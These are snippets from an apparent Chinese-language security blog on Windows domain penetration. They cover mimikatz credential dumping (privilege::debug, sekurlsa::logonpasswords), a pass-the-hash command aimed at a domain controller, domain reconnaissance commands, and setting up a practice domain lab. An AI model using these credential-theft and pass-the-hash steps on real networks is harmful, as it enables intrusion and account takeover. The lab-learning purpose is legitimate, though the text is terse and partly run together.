YouthBelief的博客

（1）管理员运行（2）必须输入privilege::debug（3）在目标主机使用mimikatz获取ntlm hashwinserver 2012R2 之前版本 可以获取到明文密码sekurlsa::logonpasswords（4） 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6

1.基本信息收集 判断网络环境systeminfo 详细信息net start 启动服务tasklist 进程列表schtasks 计划任务2.是否在域和域控判断ipconfig /all 判断存在域、dns服务器net view /domain 判断存在域net time /domain 判断主域nslookup 域名 获取域控ipping 域名 获取域控ip3. 用户信息收集目的是 了解当前计算机 或域环境下 的用户及用户组信息，便于后期利用凭

虚拟机准备域控（winserver 2018 ）域成员（win7）网络准备都 接入 仅主机模式 同一网段我选择的网段为 10.10.10.0域控 ip设为域成员 win7 ip设为搭建域服务win server 2018点击最小角开始旁边的 图标 -》角色-》添加角色下一步域服务打钩（我已经安装 所以 显示已安装）后续步骤 添加 默认的.net功能 其余 默认下一步即可。安装完域服务后 进行新建域配置完后重新启动即可win 2008 ping